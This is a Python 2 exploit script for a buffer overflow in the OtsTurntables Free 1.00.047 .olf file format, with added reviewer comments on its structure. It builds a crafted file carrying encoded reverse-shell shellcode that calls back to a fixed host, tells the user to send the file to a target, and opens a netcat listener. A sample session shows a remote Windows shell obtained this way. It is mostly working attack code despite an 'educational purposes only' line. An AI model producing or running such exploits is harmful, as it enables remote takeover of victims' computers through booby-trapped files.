#!/usr/bin/python
#
# ###################################################################
#
# OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Date: 14-01-2010
# Author: mr_me
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on: Windows XP sp3
# Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz
# bad chars: '\x00\x0a\xbd\x0d\x20'
#
# ** For educational purposes only **
#
# ####################################################################
#
# ~! I want to go back to the matrix !~
#
# mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf
#
# [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit
# [+] Creating exploit file..
# [+] Writing 15000 bytes to awsome-electro.olf.. ph33r
# [+] Send awsome-electro.olf to your target
# [+] Waiting for a shell on port: 4444
# listening on [any] 4444 ...
# 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\OtsLabs\Lists>
#
# Reviewer notes on structure:
#   1. banner()          prints the ASCII art and the tool title
#   2. argv handling     port (used only for the local nc listener) and the
#                        output file name, both taken verbatim from argv
#   3. payload assembly  a 15000-byte string written to the .olf file
#   4. listener          os.system('nc -lvp <port>') blocks until nc exits
# Python 2 syntax throughout (print statements, str payload); it will not
# run unmodified under Python 3.
import sys, os

def banner():
    """Print the ASCII-art banner and the exploit title to stdout."""
    # The art below has had its internal whitespace collapsed in this copy.
    print "|------------------------------------------------------------------|"
    print "| __ __ |"
    print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
    print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
    print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
    print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
    print "| |"
    print "|-------------------------------------------------[ EIP Hunters ]--|"
    print "[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit"

# Both positional arguments are required.  The usage string ends in a lone
# space: the argument placeholders appear to have been lost in this copy
# (presumably "<port> <filename>", per the example run in the header) -- TODO confirm.
if len(sys.argv) < 3:
    banner()
    print "[?] Usage: " + sys.argv[0] + " "
    sys.exit(1)

port = sys.argv[1]      # NOTE(review): never validated as a number; spliced into a shell command below
filename = sys.argv[2]  # path of the crafted .olf file that will be written

# windows/shell_reverse_tcp - 310 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
#
# LHOST, LPORT and EXITFUNC are fixed inside these encoded bytes; the `port`
# argument above does not change them, it only sets where nc listens.
shell = ("\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x47\x4b"
"\x25\x9a\x83\xeb\xfc\xe2\xf4\xbb\x21\xce\xd7\xaf\xb2\xda\x65"
"\xb8\x2b\xae\xf6\x63\x6f\xae\xdf\x7b\xc0\x59\x9f\x3f\x4a\xca"
"\x11\x08\x53\xae\xc5\x67\x4a\xce\xd3\xcc\x7f\xae\x9b\xa9\x7a"
"\xe5\x03\xeb\xcf\xe5\xee\x40\x8a\xef\x97\x46\x89\xce\x6e\x7c"
"\x1f\x01\xb2\x32\xae\xae\xc5\x63\x4a\xce\xfc\xcc\x47\x6e\x11"
"\x18\x57\x24\x71\x44\x67\xae\x13\x2b\x6f\x39\xfb\x84\x7a\xfe"
"\xfe\xcc\x08\x15\x11\x07\x47\xae\xea\x5b\xe6\xae\xda\x4f\x15"
"\x4d\x14\x09\x45\xc9\xca\xb8\x9d\x43\xc9\x21\x23\x16\xa8\x2f"
"\x3c\x56\xa8\x18\x1f\xda\x4a\x2f\x80\xc8\x66\x7c\x1b\xda\x4c"
"\x18\xc2\xc0\xfc\xc6\xa6\x2d\x98\x12\x21\x27\x65\x97\x23\xfc"
"\x93\xb2\xe6\x72\x65\x91\x18\x76\xc9\x14\x08\x76\xd9\x14\xb4"
"\xf5\xf2\x87\xe3\x27\x90\x21\x23\x34\xc6\x21\x18\xac\x7b\xd2"
"\x23\xc9\x63\xed\x2b\x72\x65\x91\x21\x35\xcb\x12\xb4\xf5\xfc"
"\x2d\x2f\x43\xf2\x24\x26\x4f\xca\x1e\x62\xe9\x13\xa0\x21\x61"
"\x13\xa5\x7a\xe5\x69\xed\xde\xac\x67\xb9\x09\x08\x64\x05\x67"
"\xa8\xe0\x7f\xe0\x8e\x31\x2f\x39\xdb\x29\x51\xb4\x50\xb2\xb8"
"\x9d\x7e\xcd\x15\x1a\x74\xcb\x2d\x4a\x74\xcb\x12\x1a\xda\x4a"
"\x2f\xe6\xfc\x9f\x89\x18\xda\x4c\x2d\xb4\xda\xad\xb8\x9b\x4d"
"\x7d\x3e\x8d\x5c\x65\x32\x4f\xda\x4c\xb8\x3c\xd9\x65\x97\x23"
"\xd5\x10\x43\x14\x76\x65\x91\xb4\xf5\x9a");

# Buffer layout (15000 bytes in total):
#   [0:900]    filler 'A'
#   [900:904]  \xeb\x06 (x86 short jmp, +6) followed by two nops -- appears to
#              hop over the 4-byte address that comes next
#   [904:908]  address the author annotates as CALL DWORD PTR SS:[ESP+2c]
#   [908:938]  30-byte nop sled
#   [938:...]  the encoded payload above
#   remainder  'A' padding so the file is exactly 15000 bytes
# A jump stub immediately followed by a handler address is the shape of an
# SEH overwrite, which matches EXITFUNC=seh in the payload header; the
# offset and address are specific to v1.00.047 on XP SP3 per the header.
exploit = "\x41" * 900
exploit += "\xeb\x06\x90\x90"
exploit += "\x46\x79\x23\x01" # CALL DWORD PTR SS:[ESP+2c]
exploit += "\x90" * 30
exploit += shell
exploit += "\x41" * (15000-len(exploit))

banner()

# NOTE(review): the bare `except` below catches everything (IOError,
# KeyboardInterrupt, NameError, ...) and reports all of it as a permissions
# problem.  The file is opened in text mode without `with`, so a failed write
# leaves the handle open; the header's bad-char list excludes \x0a and \x0d,
# which is presumably why text-mode newline translation on Windows is not a
# concern here -- verify.  os.system() never raises, so a missing `nc` or a
# bad port value is silently ignored; `port` is concatenated into the shell
# command line unvalidated.
try:
    print "[+] Creating exploit file.."
    print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r"
    print "[+] Send " + filename + " to your target"
    turntable = open(filename,'w');
    turntable.write(exploit);
    turntable.close();
    print "[+] Waiting for a shell on port: " + port
    os.system('nc -lvp ' + port)
except:
    print "[-] Error: You do not have correct permissions.."